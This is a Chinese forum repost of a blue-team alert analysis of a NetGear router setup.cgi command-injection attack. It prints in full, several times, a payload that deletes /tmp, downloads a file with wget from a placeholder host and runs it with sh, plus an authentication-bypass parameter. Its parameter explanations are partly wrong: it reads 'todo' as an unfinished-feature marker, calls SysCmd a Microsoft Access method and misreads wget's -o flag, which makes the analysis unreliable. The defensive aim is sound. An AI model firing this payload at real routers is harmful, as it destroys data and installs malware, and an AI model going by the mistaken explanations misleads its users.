ToB企服应用市场:ToB评测及商务社交产业平台

标题: 我见我思之hvv偷师学艺——命令注入linux_command_inject [打印本页]

作者: 南七星之家    时间: 2024-5-27 01:05
标题: 我见我思之hvv偷师学艺——命令注入linux_command_inject
常见告警信息价值提取:

源IP

大概率为代理IP,可通过情报平台进行识别此IP的历史攻击举动。
源端口

参考意义不大。
目标IP

我方资产IP(可定位疑似弊端的具体资产范围)。
目标端口

我方资产IP对应端口(可辅助确认端口所在资产范围)。
相应码

辅助确认弊端是否成功(200代表疑似弊端利用成功。4XX/5XX一样平常都是利用失败)。
载荷:

Get /setup.cgi?next_file=netgear.cgr&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://x.x.x.x:x/example+-o+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP /1.0
请求体:

Get /setup.cgi?next_file=netgear.cgr&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://x.x.x.x:x/example+-o+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP /1.0
弊端解析:

弊端名称:

NetGear 路由器恣意执行弊端(通过搜索此弊端的主要程序文件setup.cgi发现)
弊端利用原理:

部分内容参考自:
https://blog.csdn.net/li371518473/article/details/128527613 https://blog.csdn.net/weixin_35509395/article/details/119636901
Poc整体参考示例:
/setup.cgi?next_file=netgear.cgr&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://x.x.x.x:x/example+-o+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP /1.0
首先,通过 GET 方法触发 “setup.cgi” 文件。
“setup.cgi” 文件一样平常作为安装工具利用,可以通过编辑此文件进行安装对应系统。
然后,通过 todo 命令执行 syscmd,
todo是一个特殊的标志,用于标识需要实现但现在还未实现的功能.
最后,通过 syscmd 来执行下载和执行病毒的命令。
使⽤SysCmd⽅法可以:在状态栏中显⽰进度表或可选的指定⽂本,返回有关 Microsoft Access 及其关联⽂件的信息,或返回指定数据库对象的状态
“cmd=rm+-rf+/tmp/*”
表示删除/tmp文件夹下所有内容。
“wget+http://x.x.x.x:x/example+-o+/tmp/netgear”
表示:下载网址“http://x.x.x.x:x/” 下example夹内的内容 至 特定的文件夹 “/tmp/netgear” 下。
《本文原创地点:https://www.cnblogs.com/--l-/p/18214651,码字不易,转载请注明出处。》
sh+netgear
通过 “sh” 脚本命令执行 "netgear"文件(已下载exp)
curpath=/
切换当前脚本路径为根目录/
currentsetting.htm=1
currentsetting.htm字段会触发一个判定标志,这个标志=1会直接使判定通过。作用结果:绕过访问验证机制。
总结与收获:

调用系统本身程序文件(弊端利用点)+设定弊端下载位置+下载exp+执行exp+绕过目标系统访问鉴权(exp安全落地)。
万般皆自度,半点不由人。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4